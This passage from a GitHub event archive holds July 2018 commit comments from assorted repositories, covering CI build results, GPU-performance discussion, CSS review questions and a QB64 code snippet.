Badge](http://img.shields.io/badge/coverage%20status-71.23%25-green.png)</a>\n"}},"created_at":"2018-07-31T23:53:33Z"}
{"id":"8047314962","type":"CommitCommentEvent","actor":{"login":"FloridaStream"},"repo":{"name":"tsukasachandesu/video_decrypter"},"payload":{"comment":{"id":29913855,"position":null,"line":null,"path":null,"commit_id":"76e134a4a5d56fd8bbed5b36f580679818a60672","created_at":"2018-07-31T23:54:57Z","updated_at":"2018-07-31T23:54:57Z","author_association":"NONE","body":"@sundelirajesh this script dont work bro, you will lose u time. Original repository already deleted, this is a copy and have outdated codes.\r\n\r\nAs for what you asked, your question is already the answer, difficult to be clearer than that.\r\n\r\n Good luck bro."}},"created_at":"2018-07-31T23:54:57Z"}
{"id":"8047320339","type":"CommitCommentEvent","actor":{"login":"shermp"},"repo":{"name":"NiLuJe/FBInk"},"payload":{"comment":{"id":29913862,"position":null,"line":null,"path":null,"commit_id":"f76285f6bfd77169515cf65ead57fa8f346a25eb","created_at":"2018-07-31T23:56:53Z","updated_at":"2018-07-31T23:56:53Z","author_association":"NONE","body":"How expensive would it be in the grand scheme of things to just measure the height of the button directly? Once a button has been found horizontally, just back up a couple of pixels and start scanning down until the height is found. Done, dusted and works with all devices.\r\n\r\nThen the only remaining guesstimate is the width threshold, which I doubt can, or should, be avoided.\r\n\r\nJust my 2c. Feel free to tell me where to stick it :p"}},"created_at":"2018-07-31T23:56:53Z"}
{"id":"8047320537","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29913866,"position":null,"line":null,"path":null,"commit_id":"ab1a63b6b0cfd85ac2f99861781e1c28f71bce99","created_at":"2018-07-31T23:56:57Z","updated_at":"2018-07-31T23:56:57Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1067](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1067).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1067-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-31T23:56:57Z"}
{"id":"8047320809","type":"CommitCommentEvent","actor":{"login":"MrLar"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29913867,"position":null,"line":null,"path":null,"commit_id":"cb4d46a09203b5325c87c8b12ddaac3bb7ab6b4c","created_at":"2018-07-31T23:57:03Z","updated_at":"2018-07-31T23:57:03Z","author_association":"MEMBER","body":"![](https://desii-is-the-love.of-my.life/031623.png)"}},"created_at":"2018-07-31T23:57:03Z"}
{"id":"8047321866","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29913871,"position":null,"line":null,"path":null,"commit_id":"5b8fc2463b30e642ddf174754306c29c1ac2ae9b","created_at":"2018-07-31T23:57:26Z","updated_at":"2018-07-31T23:57:26Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - Win64-Windows-7-VisualStudio-14: Build Failed\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b8fc2463b30e642ddf174754306c29c1ac2ae9b-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b8fc2463b30e642ddf174754306c29c1ac2ae9b-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T23:57:26Z"}
{"id":"8047325670","type":"CommitCommentEvent","actor":{"login":"queer"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29913880,"position":null,"line":null,"path":null,"commit_id":"cb4d46a09203b5325c87c8b12ddaac3bb7ab6b4c","created_at":"2018-07-31T23:58:45Z","updated_at":"2018-07-31T23:58:45Z","author_association":"CONTRIBUTOR","body":"My Mantaro has no trees !!! Mantaro LITERALLY scammed me !!!!!!!!"}},"created_at":"2018-07-31T23:58:45Z"}
{"id":"8047328525","type":"CommitCommentEvent","actor":{"login":"Desiiii"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29913885,"position":null,"line":null,"path":null,"commit_id":"cb4d46a09203b5325c87c8b12ddaac3bb7ab6b4c","created_at":"2018-07-31T23:59:51Z","updated_at":"2018-07-31T23:59:51Z","author_association":"CONTRIBUTOR","body":"there's a command in my tree"}},"created_at":"2018-07-31T23:59:51Z"}
{"id":"8041445114","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29897125,"position":null,"line":null,"path":null,"commit_id":"494294b728244d0f123ea856a1b7b2a8fb400f2c","created_at":"2018-07-31T03:00:06Z","updated_at":"2018-07-31T03:00:06Z","author_association":"NONE","body":"#6868-EngRefEquationFixPart1 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2348 of 2348 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T03:00:06Z"}
{"id":"8041446864","type":"CommitCommentEvent","actor":{"login":"kaniini"},"repo":{"name":"kaniini/antissh"},"payload":{"comment":{"id":29897132,"position":5,"line":8,"path":"antissh.conf.example","commit_id":"f6a3985fb6f24cb87ee8dfe3f013c29363cc11d6","created_at":"2018-07-31T03:00:40Z","updated_at":"2018-07-31T03:00:40Z","author_association":"OWNER","body":"it's probably the quotes.  try the new version, it will dump irc logs to stdout."}},"created_at":"2018-07-31T03:00:40Z"}
{"id":"8041447108","type":"CommitCommentEvent","actor":{"login":"bazemoreb"},"repo":{"name":"2600hz/kazoo"},"payload":{"comment":{"id":29897133,"position":null,"line":null,"path":null,"commit_id":"39bd6621ed6d6e3c520568dc5c7eac9b12a43bb4","created_at":"2018-07-31T03:00:45Z","updated_at":"2018-07-31T03:00:45Z","author_association":"NONE","body":"Luis- after upgrading this we are now seeing situations where parking calls results in BLF now NOT lighting up  (as opposed to previously we'd see BLF stuck on).  Could the delay you've introduced here cause something there?  We've got a ticket for this - 38365."}},"created_at":"2018-07-31T03:00:45Z"}
{"id":"8041447983","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29897137,"position":null,"line":null,"path":null,"commit_id":"704c26ad42b4116c6a9151544a372603578fb397","created_at":"2018-07-31T03:01:04Z","updated_at":"2018-07-31T03:01:04Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-121](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-121).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-121-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-31T03:01:04Z"}
{"id":"8041450672","type":"CommitCommentEvent","actor":{"login":"jmcarp"},"repo":{"name":"18F/logsearch-boshrelease"},"payload":{"comment":{"id":29897147,"position":4,"line":67,"path":"jobs/elasticsearch/templates/config/config.yml.erb","commit_id":"a3b6151eadaac47d7d343bef22915b406fbd70e9","created_at":"2018-07-31T03:02:01Z","updated_at":"2018-07-31T03:02:01Z","author_association":"MEMBER","body":"I think it would make more sense to move this into a configurable property instead of hard-coding. We already have the `elasticsearch.config_options` property that's used below, so we could drop this change and move it to the deployment manifest. We might also want to uninstall x-pack instead of disabling it: https://www.elastic.co/guide/en/x-pack/current/xpack-uninstalling.html. Although again, we'd want that to happen in a configurable property."}},"created_at":"2018-07-31T03:02:01Z"}
{"id":"8041459742","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29897160,"position":null,"line":null,"path":null,"commit_id":"494294b728244d0f123ea856a1b7b2a8fb400f2c","created_at":"2018-07-31T03:05:21Z","updated_at":"2018-07-31T03:05:21Z","author_association":"NONE","body":"#6868-EngRefEquationFixPart1 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T03:05:21Z"}
{"id":"8041463269","type":"CommitCommentEvent","actor":{"login":"RekongRabten"},"repo":{"name":"Esukhia/derge-kangyur"},"payload":{"comment":{"id":29897166,"position":null,"line":null,"path":null,"commit_id":"aea4d26649a64fff83cc64e467b633b0bfc1b457","created_at":"2018-07-31T03:06:40Z","updated_at":"2018-07-31T03:06:40Z","author_association":"NONE","body":"ངས་ཀྱང་མ་དཔེ་ལ་བལྟས་ནས་རང་འཇགས་བཞག་པ་ཡིན། ཡིན་ཡང་མནན་ནོར་ཤོར་འདུག ཚེག་གཉིས་རང་འཇགས་ལྷག་འདུག སྙི་ཆས་འདི་ད།\r\n"}},"created_at":"2018-07-31T03:06:40Z"}
{"id":"8041464195","type":"CommitCommentEvent","actor":{"login":"yesmeck"},"repo":{"name":"react-component/animate"},"payload":{"comment":{"id":29897172,"position":null,"line":null,"path":null,"commit_id":"e0288b8c60fac8df7cce47680319f7e5d86cccfc","created_at":"2018-07-31T03:07:02Z","updated_at":"2018-07-31T03:07:02Z","author_association":"MEMBER","body":"npm 上 latest 标签要改成正式版"}},"created_at":"2018-07-31T03:07:02Z"}
{"id":"8041468329","type":"CommitCommentEvent","actor":{"login":"Drpyoung"},"repo":{"name":"dedemao/weixinPay"},"payload":{"comment":{"id":29897181,"position":38,"line":38,"path":"notify.php","commit_id":"e5df373c44d1128b5b2d1687fd78e40ff26887bc","created_at":"2018-07-31T03:08:38Z","updated_at":"2018-07-31T03:08:38Z","author_association":"NONE","body":"PHP7.0之后，$GLOBALS[\"HTTP_RAW_POST_DATA\"]被废弃，换成`$postStr = file_get_contents('php://input');`更合适。"}},"created_at":"2018-07-31T03:08:38Z"}
{"id":"8041471807","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29897189,"position":126,"line":743,"path":"epic_bf_dev/EPIC_bifrost.py","commit_id":"4b377b825baebbe6dbeea0cb50fe6ff8623d06ee","created_at":"2018-07-31T03:10:03Z","updated_at":"2018-07-31T03:10:03Z","author_association":"COLLABORATOR","body":"Yeah, I was working on adding support for complex numbers into reduce in a few weeks ago.  I should probably try to finish it."}},"created_at":"2018-07-31T03:10:03Z"}
{"id":"8041472093","type":"CommitCommentEvent","actor":{"login":"jlcarvalho"},"repo":{"name":"Futuring/futuring.com.br"},"payload":{"comment":{"id":29897192,"position":null,"line":null,"path":null,"commit_id":"481e3cd35a38f90fbc0c57f6b47af8cb3f14d227","created_at":"2018-07-31T03:10:10Z","updated_at":"2018-07-31T03:10:10Z","author_association":"CONTRIBUTOR","body":"\n<h3>Specifies Valid Language and theme-color</h3>\nDemo: <strong><a href='https://futuring-fuqcortube.now.sh' target='_blank'>https://futuring-fuqcortube.now.sh</a></strong>\n"}},"created_at":"2018-07-31T03:10:10Z"}
{"id":"8041472487","type":"CommitCommentEvent","actor":{"login":"ThuanPx"},"repo":{"name":"framgia/Music_20"},"payload":{"comment":{"id":29897193,"position":6,"line":12,"path":"app/src/main/res/values/strings.xml","commit_id":"0516cda1646488a5560d2554418732727d26328f","created_at":"2018-07-31T03:10:18Z","updated_at":"2018-07-31T03:10:18Z","author_association":"NONE","body":"genre -> Genre nhỉ :v"}},"created_at":"2018-07-31T03:10:18Z"}
{"id":"8041472931","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29897194,"position":null,"line":null,"path":null,"commit_id":"8bfccc05ccd263e24a411c6217f19e23df6caf7c","created_at":"2018-07-31T03:10:29Z","updated_at":"2018-07-31T03:10:29Z","author_association":"NONE","body":"expanded-runperiod (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2957 of 2957 tests passed, 3 test warnings)\n\nMessages:\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 2 tests had: Table small diffs.\n * 1 test had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bfccc05ccd263e24a411c6217f19e23df6caf7c-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bfccc05ccd263e24a411c6217f19e23df6caf7c-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T03:10:29Z"}
{"id":"8041478647","type":"CommitCommentEvent","actor":{"login":"Quinn-Donnelly"},"repo":{"name":"Quinn-Donnelly/projectOne"},"payload":{"comment":{"id":29897197,"position":null,"line":null,"path":null,"commit_id":"43236bb65359b3ee09558a684fa2259007361e28","created_at":"2018-07-31T03:12:39Z","updated_at":"2018-07-31T03:12:39Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Routes for Requests](https://trello.com/c/aviWWGaB/19-routes-for-requests)"}},"created_at":"2018-07-31T03:12:39Z"}
{"id":"8041487479","type":"CommitCommentEvent","actor":{"login":"Yay295"},"repo":{"name":"AniDevTwitter/animeopenings"},"payload":{"comment":{"id":29897215,"position":null,"line":null,"path":null,"commit_id":"7b20be19571677e3544e6dd9eab7cf2984f6b693","created_at":"2018-07-31T03:15:54Z","updated_at":"2018-07-31T03:15:54Z","author_association":"COLLABORATOR","body":"Nothing actually changed in `mainLoop` other than `if (paused) return;` to `if (paused || state != STATES.INITIALIZED) return;`, and `requestAnimationFrame(mainLoop);` was moved to the end of the function."}},"created_at":"2018-07-31T03:15:54Z"}
{"id":"8041487743","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29897216,"position":null,"line":null,"path":null,"commit_id":"98d284ab65b9c9b11513ab11ccf2a3a6079d91d0","created_at":"2018-07-31T03:16:00Z","updated_at":"2018-07-31T03:16:00Z","author_association":"COLLABORATOR","body":"@jaycedowell Okay so we both clearly tried to work on the same thing at the same time without any cross-talk. \r\n\r\nI think my way can work the fastest if we can get the reduction to play nice with the complex numbers, then all that happens is the GPU will just spit out an image every integration time of choice, and it just does all the images in one big map function. \r\n\r\nFor now I think your add-on will work the best, until reduction can be extended. \r\n\r\nLet me know have a go at optimising the auto-correlations as they don't need to be gridded every single TBN timestamp, you can just average everything. \r\n\r\n@adampbeardsley This is getting faster, but we're still not there yet. 10ms of TBN data takes ~1.4 seconds to process. \r\n\r\n"}},"created_at":"2018-07-31T03:16:00Z"}
{"id":"8041489313","type":"CommitCommentEvent","actor":{"login":"sherifshsffa91"},"repo":{"name":"NikolaBoyko/stm32f4-discovery-audio"},"payload":{"comment":{"id":29897219,"position":null,"line":null,"path":null,"commit_id":"7652a94e0e7d53acac92d311644319daea98a78b","created_at":"2018-07-31T03:16:37Z","updated_at":"2018-07-31T03:16:37Z","author_association":"NONE","body":"Hi what is the output like "}},"created_at":"2018-07-31T03:16:37Z"}
{"id":"8041489587","type":"CommitCommentEvent","actor":{"login":"zombieJ"},"repo":{"name":"react-component/animate"},"payload":{"comment":{"id":29897220,"position":null,"line":null,"path":null,"commit_id":"e0288b8c60fac8df7cce47680319f7e5d86cccfc","created_at":"2018-07-31T03:16:43Z","updated_at":"2018-07-31T03:16:43Z","author_association":"MEMBER","body":"> npm 上 latest 标签要改成正式版\r\n\r\nTree 里的 virtual list 用顺了再切，现在还在试~"}},"created_at":"2018-07-31T03:16:43Z"}
{"id":"8041490013","type":"CommitCommentEvent","actor":{"login":"memononen"},"repo":{"name":"Pomax/processing-bezier-master"},"payload":{"comment":{"id":29897221,"position":null,"line":null,"path":null,"commit_id":"0f8b5c64fa20cd7fefa859ed9f38f8dc48aab68c","created_at":"2018-07-31T03:16:53Z","updated_at":"2018-07-31T03:16:53Z","author_association":"NONE","body":"Nice! On Mac you get a lot of `event.getCount() == 0` (like 10 per one real step), which makes behavior like `event.getCount() < 0 ? 1 : -1` behave incorrectly. Maybe an early out, in case  `event.getCount() == 0`."}},"created_at":"2018-07-31T03:16:53Z"}
{"id":"8041492253","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29897224,"position":126,"line":743,"path":"epic_bf_dev/EPIC_bifrost.py","commit_id":"4b377b825baebbe6dbeea0cb50fe6ff8623d06ee","created_at":"2018-07-31T03:17:46Z","updated_at":"2018-07-31T03:17:46Z","author_association":"COLLABORATOR","body":"That would probably make the accumulation much faster, as an entire gulp can be processed in one go. See my (alternative..) GPU accumulation block for an example of what I was thinking.\n\n> On 30 Jul 2018, at 20:10, jaycedowell <notifications@github.com> wrote:\n> \n> Yeah, I was working on adding support for complex numbers into reduce in a few weeks ago. I should probably try to finish it.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/nithyanandan/EPIC/commit/4b377b825baebbe6dbeea0cb50fe6ff8623d06ee#commitcomment-29897189>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AB73hEhNKr79LX_VyN0Fe2yh0pa2PdTLks5uL8qLgaJpZM4VngYb>.\n> \n\n"}},"created_at":"2018-07-31T03:17:46Z"}
{"id":"8041492293","type":"CommitCommentEvent","actor":{"login":"jlcarvalho"},"repo":{"name":"Futuring/futuring.com.br"},"payload":{"comment":{"id":29897225,"position":null,"line":null,"path":null,"commit_id":"6cc5293995a6cba1bf3dba9ee8b62bdb66b44e56","created_at":"2018-07-31T03:17:47Z","updated_at":"2018-07-31T03:17:47Z","author_association":"CONTRIBUTOR","body":"\n<h3>Remove maximum-scale</h3>\nDemo: <strong><a href='https://futuring-wolziefyzs.now.sh' target='_blank'>https://futuring-wolziefyzs.now.sh</a></strong>\n"}},"created_at":"2018-07-31T03:17:47Z"}
{"id":"8041492496","type":"CommitCommentEvent","actor":{"login":"yesmeck"},"repo":{"name":"react-component/animate"},"payload":{"comment":{"id":29897226,"position":null,"line":null,"path":null,"commit_id":"e0288b8c60fac8df7cce47680319f7e5d86cccfc","created_at":"2018-07-31T03:17:52Z","updated_at":"2018-07-31T03:17:52Z","author_association":"MEMBER","body":"哦，我看错了。"}},"created_at":"2018-07-31T03:17:52Z"}
{"id":"8041495390","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29897228,"position":null,"line":null,"path":null,"commit_id":"98d284ab65b9c9b11513ab11ccf2a3a6079d91d0","created_at":"2018-07-31T03:18:59Z","updated_at":"2018-07-31T03:18:59Z","author_association":"COLLABORATOR","body":"1.4 seconds?  Really?"}},"created_at":"2018-07-31T03:18:59Z"}
{"id":"8041510480","type":"CommitCommentEvent","actor":{"login":"lzfee0227"},"repo":{"name":"mobxjs/mobx-react"},"payload":{"comment":{"id":29897259,"position":null,"line":null,"path":null,"commit_id":"bb44e4011cfbc15a1c99792cb3cf9ca081e75bdd","created_at":"2018-07-31T03:24:45Z","updated_at":"2018-07-31T03:24:45Z","author_association":"NONE","body":"Why should we remove the helpful tips ? @mweststrate \r\nDoes it means something has changed ?"}},"created_at":"2018-07-31T03:24:45Z"}
{"id":"8041513755","type":"CommitCommentEvent","actor":{"login":"udarachamara"},"repo":{"name":"udarachamara/express"},"payload":{"comment":{"id":29897264,"position":6,"line":6,"path":"includes/test.js","commit_id":"41365a553b067a93445b5ca10170ed3d97e9e5ce","created_at":"2018-07-31T03:26:01Z","updated_at":"2018-07-31T03:26:01Z","author_association":"OWNER","body":"add a databse"}},"created_at":"2018-07-31T03:26:01Z"}
{"id":"8041516378","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29897266,"position":null,"line":null,"path":null,"commit_id":"98d284ab65b9c9b11513ab11ccf2a3a6079d91d0","created_at":"2018-07-31T03:27:03Z","updated_at":"2018-07-31T03:27:03Z","author_association":"COLLABORATOR","body":"That sucks.  What does the breakdown of the timing look like?"}},"created_at":"2018-07-31T03:27:03Z"}
{"id":"8041519305","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29897274,"position":null,"line":null,"path":null,"commit_id":"aa7e92b3d51a7856dcc4f8bb6f6b850bca790b0a","created_at":"2018-07-31T03:28:13Z","updated_at":"2018-07-31T03:28:13Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [049 - Criar Pessoa Service](https://trello.com/c/ZJyNkydu/57-049-criar-pessoa-service)"}},"created_at":"2018-07-31T03:28:13Z"}
{"id":"8041525618","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29897280,"position":null,"line":null,"path":null,"commit_id":"98d284ab65b9c9b11513ab11ccf2a3a6079d91d0","created_at":"2018-07-31T03:30:36Z","updated_at":"2018-07-31T03:30:36Z","author_association":"COLLABORATOR","body":"-> GPU Time Taken: 1.446160\r\n-> Average GPU Time Taken: 1.459956 (21 samples)\r\n  Input copy time: 0.005536\r\n  Unpack time: 0.000247\r\n  Phase-up time: 0.000270\r\n  'udata' Reshape time: 0.000082\r\n  LinAlg time: 0.480904\r\n\r\nLooks like the card is just doing its best to get through the batch of DGEMM operations. "}},"created_at":"2018-07-31T03:30:36Z"}
{"id":"8041525842","type":"CommitCommentEvent","actor":{"login":"juliejonak"},"repo":{"name":"juliejonak/Sprint-Challenge--User-Interface"},"payload":{"comment":{"id":29897281,"position":null,"line":null,"path":null,"commit_id":"f65074573054736e75d9b61c2f7b6e6b3d1d99a2","created_at":"2018-07-31T03:30:40Z","updated_at":"2018-07-31T03:30:40Z","author_association":"OWNER","body":"I honestly did not consider anything else, because I was thinking that\nthese were specific only to these singular boxes on this page (and the\nnext), so it didn't require a class, because the color properties wouldn't\napply to anything else on the page.\n\nIn general, is it still best in those cases, to opt for a class?\n\nI then noted that nth child possibility for adjusting these as well.\n\nOn Mon, Jul 30, 2018 at 9:16 PM, Raymond Garcia <notifications@github.com>\nwrote:\n\n> Great job on the boxes. What factored into choosing ids over classes?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/juliejonak/Sprint-Challenge--User-Interface/commit/f65074573054736e75d9b61c2f7b6e6b3d1d99a2#commitcomment-29896936>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AnGngbzJRilEZLDKS3M3QSNQpj5J1mSDks5uL74JgaJpZM4VnfR4>\n> .\n>\n"}},"created_at":"2018-07-31T03:30:40Z"}
{"id":"8041529191","type":"CommitCommentEvent","actor":{"login":"Damon-Liu"},"repo":{"name":"Damon-Liu/Python-HTTP-Reverse_Shell-basic"},"payload":{"comment":{"id":29897286,"position":null,"line":null,"path":null,"commit_id":"019e4770cca89902d9f0af620524b439c3e83495","created_at":"2018-07-31T03:32:07Z","updated_at":"2018-07-31T03:32:07Z","author_association":"OWNER","body":"Only for education purposes "}},"created_at":"2018-07-31T03:32:07Z"}
{"id":"8041531048","type":"CommitCommentEvent","actor":{"login":"juliejonak"},"repo":{"name":"juliejonak/Sprint-Challenge--User-Interface"},"payload":{"comment":{"id":29897294,"position":null,"line":null,"path":null,"commit_id":"f9458af7e2721d630d7ba984e465a4ea120c9e3c","created_at":"2018-07-31T03:32:51Z","updated_at":"2018-07-31T03:32:51Z","author_association":"OWNER","body":"Thank you!\n\nI had difficulty with aligning the input boxes on the form because the\nmargin-left always moved left X number of pixels from the Label, not from\nthe margin.\n\nUltimately, I used specific pixel indications but that wouldn't work well\nwith responsive design, would it?\n\nIs there another way to specify that a certain child element moves\nindependently of a sibling element? (I.e. Those input boxes could have a\nmargin specified based on the distance from the parent element, not the\nsibling Label element)?\n\nOn Mon, Jul 30, 2018 at 9:25 PM, Raymond Garcia <notifications@github.com>\nwrote:\n\n> I am impressed by that contact form! It looks great and the form is even\n> highlighted when you click on its label. Awesome job, Julie!\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/juliejonak/Sprint-Challenge--User-Interface/commit/f9458af7e2721d630d7ba984e465a4ea120c9e3c#commitcomment-29896971>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AnGngeUZ326Enzdx23PFQN3wwfXH-2xHks5uL8AvgaJpZM4Vnftu>\n> .\n>\n"}},"created_at":"2018-07-31T03:32:51Z"}
{"id":"8041534237","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29897298,"position":null,"line":null,"path":null,"commit_id":"29e3cad5912833f54521230c8a4cdf8ecf617b2d","created_at":"2018-07-31T03:34:09Z","updated_at":"2018-07-31T03:34:09Z","author_association":"COLLABORATOR","body":"@KentJames I had also added a \"cpu only\" flag to ImagingOp block as well."}},"created_at":"2018-07-31T03:34:09Z"}
{"id":"8041539123","type":"CommitCommentEvent","actor":{"login":"FellippeHeitor"},"repo":{"name":"Galleondragon/qb64"},"payload":{"comment":{"id":29897306,"position":null,"line":null,"path":null,"commit_id":"c83b15eb95e3655b6c8e8c1f1bba1e8cfb44e09c","created_at":"2018-07-31T03:36:01Z","updated_at":"2018-07-31T03:36:01Z","author_association":"COLLABORATOR","body":"```\r\nSCREEN _NEWIMAGE(128, 25, 0)\r\n\r\n_ACCEPTFILEDROP\r\nPRINT \"Drag files from a folder and drop them in this window...\"\r\n\r\nDO\r\n    IF _TOTALDROPPEDFILES THEN\r\n        FOR i = 1 TO _TOTALDROPPEDFILES\r\n            a$ = _DROPPEDFILE$\r\n            COLOR 15\r\n            PRINT i,\r\n            IF _FILEEXISTS(a$) THEN\r\n                COLOR 2: PRINT \"file\",\r\n            ELSE\r\n                IF _DIREXISTS(a$) THEN\r\n                    COLOR 3: PRINT \"folder\",\r\n                ELSE\r\n                    COLOR 4: PRINT \"not found\", 'highly unlikely, but who knows?\r\n                END IF\r\n            END IF\r\n            COLOR 15\r\n            PRINT a$\r\n        NEXT\r\n    END IF\r\n\r\n    _LIMIT 30\r\nLOOP\r\n```"}},"created_at":"2018-07-31T03:36:01Z"}
{"id":"8041540156","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29897309,"position":null,"line":null,"path":null,"commit_id":"16bfa0e843c29d6245631b4335f6e6ef0d47cc8d","created_at":"2018-07-31T03:36:25Z","updated_at":"2018-07-31T03:36:25Z","author_association":"NONE","body":"#6868-EngRefEquationFixPart1 (RKStrand) - x86_64-MacOS-10.9-clang: OK (2955 of 2955 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-16bfa0e843c29d6245631b4335f6e6ef0d47cc8d-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-16bfa0e843c29d6245631b4335f6e6ef0d47cc8d-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T03:36:25Z"}
{"id":"8041540273","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/meta-fulan"},"payload":{"comment":{"id":29897311,"position":null,"line":null,"path":null,"commit_id":"462730912bda7680c3fedd266f9ee316a30398e0","created_at":"2018-07-31T03:36:27Z","updated_at":"2018-07-31T03:36:27Z","author_association":"MEMBER","body":"Please use like https://github.com/PLi-metas/pli-extras/blob/develop/recipes-openpli/images/pli-extras-enigma2-image.bb#L95~L97"}},"created_at":"2018-07-31T03:36:27Z"}
{"id":"8041541788","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29897313,"position":null,"line":null,"path":null,"commit_id":"98d284ab65b9c9b11513ab11ccf2a3a6079d91d0","created_at":"2018-07-31T03:37:06Z","updated_at":"2018-07-31T03:37:06Z","author_association":"COLLABORATOR","body":"I'm assuming that that leaves the IFFT at about ~0.8 s?"}},"created_at":"2018-07-31T03:37:06Z"}
